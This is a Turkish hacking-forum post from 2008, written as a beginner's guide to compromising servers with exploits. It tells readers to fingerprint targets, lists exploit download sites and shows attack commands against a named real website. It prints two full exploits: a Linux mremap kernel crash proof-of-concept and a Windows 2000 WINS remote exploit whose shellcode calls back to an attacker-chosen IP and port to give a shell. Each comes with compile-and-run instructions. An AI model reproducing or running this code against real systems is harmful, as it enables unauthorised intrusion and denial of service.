Would you like to react to this message? Create an account in a few clicks or log in to continue.


 
AnasayfaAnasayfa  Latest imagesLatest images  Kayıt OlKayıt Ol  Giriş yapGiriş yap  

 

 Exploit dökümanı...

Aşağa gitmek 
YazarMesaj
hacked
MASTER
MASTER
hacked


Mesaj Sayısı : 199
Kayıt tarihi : 08/03/08

Exploit dökümanı... Empty
MesajKonu: Exploit dökümanı...   Exploit dökümanı... EmptySalı Mart 11, 2008 12:19 am

exploit nedir:
kısa olarak shell :uzaktaki servera bir bilgisayara bağlanarak o bilgisayarı kısıtlı haklarla kendi bilgisayarımız gibi kullanmamıza yarar. telnet gibi kullanarak bağlanabiliriz..


telnet kendimiz putty kullanarak bağlandık sisteme exp kullanarak kendimize bir port açtık ve putty le bağlandık..





exploit c dilinde yazylyrlar az sayyda perl dilinde yazılmıştır
yazıldıkları dilere göre uzuntıları farklıdır.
c dilinde yazyldyysalar *.c perl'de yazılmışsa *.pl uzantılıdır. .
exploit kullanmak içinshell yada active perl yada daha farklı derliyici lazım
genelde exploiti kullanmak için sistemin yapısına bakmamız lazım yani bulduğumuz açık o sisteme uyuyorsa sistemizden exp derleyip sisteme root olmanın imkanlarını ararız. sistemin işletim sistemi, sunucusu ve versiyonunu tespit etmenin yolu netcraft dır. www.netcraft.com adresinden hedef sitenin adı girilerek bu bilgiler elde edilir elde ettiğimiz bilgiye göre bulduğumuz exploitde aratırdığımız sistem özelliklerine uyan bir yer varmı tespit ederiz.exploitleri bulabileceğiniz siteler.

www.phreak.org/html/exploits.shtml
http://www.k-otik.com/exploits/
www.packetstormsecurity.nl

linux shell deysek # bu işaret çıkar elimizde perl exp loiti olduğunu varsayıyorum win de dosyaların içeriklerii edit çekiyorsak bunda pico kullanarak içeriğini görebilirsiniz..

#pico as.pl
içeriğini gördük ctrl+x yaptık ve çıktık
#chmod +x as.pl
derleme ok!
-------
#./as.pl
yada olmazsa
#/as.pl
deneyin artık çalışır halde exp

indirdiğiniz exploitin içinde nasıl kullanılacağı yazıyordur onun için kullanım hakında soru sormayın içinde yazıyor

#perl as www.kayserituning.com/forum/index.php 66666
saldırımız başladı.... örneklerimiz gerçektir.
--------------
c leri derleme
c'derlemede gcc -o exploit ve exploitadı.c seklinde exploiti derleyip çalıştırma haline getiriyoruz...

shell'e 2 girdik

ddos yapıyoruz programla deil shell olarak

#pico mremap_poc_2.c
kodunu gösterdi içeriğini
-----------------------
$ gcc -W -Wall mremap_poc_2.c && ./a.out
mmap: Cannot allocate memory
created ~65530 VMAs
now mremapping 0x3FFE5000 at 0x3FFE1000
Segmentation fault



$ dmesg | tail -n 16
kernel BUG at mmap.c:1194!
invalid operand: 0000
CPU: 0
EIP: 0010:[<c01239b5>] Not tainted
EFLAGS: 00010287
eax: 3ffe2000 ebx: ce189f80 ecx: ce189f38 edx: ce189f20
esi: ce189fc4 edi: ce189f04 ebp: ce189ec0 esp: cf101f44
ds: 0018 es: 0018 ss: 0018
Process a.out (pid: 5371, stackpage=cf101000)
Stack: ce189f80 ce189fc4 ce189f04 3ffe1000 3ffe1000 c012873f cf1b66e0 c01287c7
cf1b66e0 ce189ec0 cf100000 00001000 cf1b66fc ffff0001 cf1b66e0 00000000
c339df1c ce189ec0 cf100000 fffffff4 ce189e60 c0128896 3ffe5000 00001000
Call Trace: [<c012873f>] [<c01287c7>] [<c0128896>] [<c01086b3>]

Code: 0f 0b aa 04 21 f9 2d c0 8b 7c 24 10 8b 74 24 14 8b 5c 24 18



$ cat mremap_poc_2.c

/*
* Proof-of-concept exploit code for do_mremap() #2
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED

#define __NR_real_mremap __NR_mremap

static inline _syscall5( **** *, real_mremap, **** *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, **** *, new_address );

#define VMA_SIZE 0x00003000

int main( **** )
{
int i, ret;
**** *base0;
**** *base1;

i = 0;

while( 1 )
{
i++;

ret = (int) mmap( (**** *)( i * (VMA_SIZE + 0x1000) ),
VMA_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

if( ret == -1 )
{
perror( \"mmap\" );
break;
}

base0 = base1;
base1 = (**** *) ret;
}

printf( \"created ~%d VMAs\\n\", i );

base0 += 0x1000;
base1 += 0x1000;

printf( \"now mremapping 0x%08X at 0x%08X\\n\",
(int) base1, (int) base0 );

real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );

printf( \"kernel may not be vulnerable\\n\" );

return( 0 );
}
--------------------

gcc -W -Wall mremap_poc_2.c

yazdık derlendi ve çaılışır halde kodun başında yazıyor zaten nasıl yapılacağı arkadaşlar şimdi

#./a.out ipadres 6667

başladı ddos

--------------------------------------------------------------------------

windows 2000 kullanan server lar için exp c de yazılmış

************************************************** ***********/
/* ZUCWins 0.1 - Wins 2000 remote root exploit */
/* Exploit by : <zuc@hack.it> */
/* works on Windows 2000 SP3/SP4 probably every language */
/************************************************** ***********/

/* Successfully tested by K-OTik Security on Win2k ENGLISH & FRENCH */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <time.h>
#include <netinet/in.h>
#include <curses.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\ x59\ x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\ x57\ x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\ xff\ xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\ x0c\ x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\ x8b\ x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\ x53\ x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\ x34\ x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\ x45\ x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\ x58\ x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\ x88\ x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\ xbe\ xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\ x89\ xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\ x8b\ x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\ x66\ x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\ x53\ x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\ x10\ x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\ xff\ x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\ x5c\ x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\ x53\ xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\ xb1\ x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\ xf0\ x6a\xff\xff"
"\x55\xe4";

char mess[] =
"\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"
// "\x00\x03\x0d\x4c\x77\x77\xFF\x77\x05\x4e\x00\ x3c\ x01\x02\x03\x04"

"\x6c\xf4\x3d\x05\x00\x02\x4e\x05\x00\x02\x4e\ x05\ x00\x02\x4e\x05\x00\x02\
x4e\x05\x00\x02\x4e\x05\x00\x02\x4e\x05\x00\x02\x4 e\x05\x00\x02\x4e\x05";
char rep[] =

"\x90\x01\x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\ x05\ x90\x00\x4e\x05\x90\x00\
x4e\x05\x90\x00\x4e\x05\x90\x00\x4e\x05\x90\x03\x4 e\x05\x90\x00\x4e\x05";
**** usage();

int main(int argc, char *argv[])
{
int i,sock,sock2,sock3,addr,len=16;
int rc;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;
int cbport;
long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;

if(argc<4 || argc>4)
usage();

cbport = htons(atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

char mess2[200000];
memset(mess2,0,sizeof(mess2));
char mess3[210000];
memset(mess3,0,sizeof(mess3));
int ir;
for(ir =0;ir<200000;ir++)mess2[ir]='\x90';
memcpy(mess3,mess,sizeof(mess)-1);
int r=0;int le=sizeof(mess)-1;
for(r;r<30;r++)
{
memcpy(mess3+le,rep,sizeof(rep)-1);
le+=sizeof(rep)-1;
}
memcpy(mess3+le,mess2,200000);
memcpy(mess3+le+198000,shellcode,sizeof(shellcode) );
int lenr=le+200000+sizeof(shellcode);
hp = gethostbyname(argv[1]);

addr = inet_addr(argv[1]);

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
//printf("socket() error...\n");
exit(-1);
}

mytcp.sin_addr.s_addr = addr;

mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(42);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
sockaddr_in));
printf("[*] sending exploit\n");
send(sock,mess3,lenr,0);
printf("[*] exploit sent\n");
sleep(5);
shutdown(sock,1);
close(sock);
shutdown(sock,2);
close(sock2);
shutdown(sock,3);
close(sock3);
exit(0);
}

**** usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: ZUC-WINShit www.vulnwins.com 31.33.7.23 31337\n\n");
exit(0);
}

exploiti nasıl indirdiyseniz adını değiştirmeyinn
gcc win2000.c -o win
./win www.hedef.com 212.0.0.1 31337
olmazsa /win deneyin

windows2000 kullanan serverlar elinizde selametle kalın...
Sayfa başına dön Aşağa gitmek
 
Exploit dökümanı...
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Exploit Nedir?
» Microsoft IIS 5 SSL exploit
» MyBB Forum Exploit
» Tek Kelimeyle Hack Ve Exploit
» MS Exchange Server Remote Code Execution Exploit (MS05-021)

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 :: Exploitler-
Buraya geçin: